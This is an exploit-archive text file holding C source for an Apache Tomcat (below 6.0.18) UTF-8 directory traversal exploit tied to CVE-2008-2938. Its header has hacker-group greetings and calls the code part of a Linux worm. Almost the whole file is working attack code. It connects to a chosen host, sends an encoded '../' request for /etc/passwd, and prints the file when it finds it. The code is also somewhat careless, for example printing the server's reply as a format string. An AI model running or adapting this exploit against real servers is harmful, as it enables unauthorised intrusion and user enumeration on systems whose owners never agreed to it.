apachetomcat-traversal.txt
Posted on 28 July 2010
/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit c0d3r: mywisdom thanks for not being lame to change exploit author tis is one of my linux w0rm module for user enumerations, i've dual os worm thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r thanks to: isa m said, whitecyber thanks to all devilzc0de crews and members, all jasakom crews and members * EDB-ID: 6229 * CVE: 2008-2938 * OSVDB-ID: 47464 * Author: Simon Ryeo * Published: 2008-08-11 * Verified: Verified greetz to inj3ct0r crews: 31337 Inj3ct0r Members: cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka, Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r?, etc.. not so good but worth to try if our target directory structure has /usr/local/wwwroot */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <string.h> #include <netinet/in.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0 " #define RCVBUFSIZE 9999 #define tester "root:x" void cls() { char esc = 27; printf("%c%s",esc,"[2J"); printf("%c%s",esc,"[1;1H"); } int main(int argc,char **argv) { if(argc<2) { /**checking argument to avoid memory wasting for useless variables in vma**/ cls(); printf(" Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit "); printf(" c0d3r: mywisdom "); printf(" usage:./tomcatevil hotname "); exit(1); } else { int port=80; char echobuf[RCVBUFSIZE]; int rval,sockfd, bytesrcv, totalbytes; struct hostent *he; struct sockaddr_in their_addr; if((he=gethostbyname(argv[1])) == NULL) { perror(" Sorry please recheck your target hostname ! "); exit(1); } else { if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } else { //exploiting and try to get /etc/passwd their_addr.sin_family = AF_INET; printf(" [-]Checking whether port %d opens or not ",port); their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '�', 8); if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("failed to connect !!!"); } else { printf(" [+]Port 80 opens !!! now sending your exploit to our target "); if(send(sockfd, EXPLOIT,999,0)==-1) { perror ("send"); } else { totalbytes=0; while (totalbytes < RCVBUFSIZE) { if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0) { } else { totalbytes += bytesrcv; echobuf[bytesrcv] = '�'; } totalbytes++; } } if(echobuf) { rval=strstr (echobuf, tester); if(rval) { printf(echobuf); printf(" [+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!! "); exit(1); } else { printf(echobuf); printf(" [-]target not vulnerable !!! "); exit(1); } } } close(sockfd); //eof exploiting } } } }
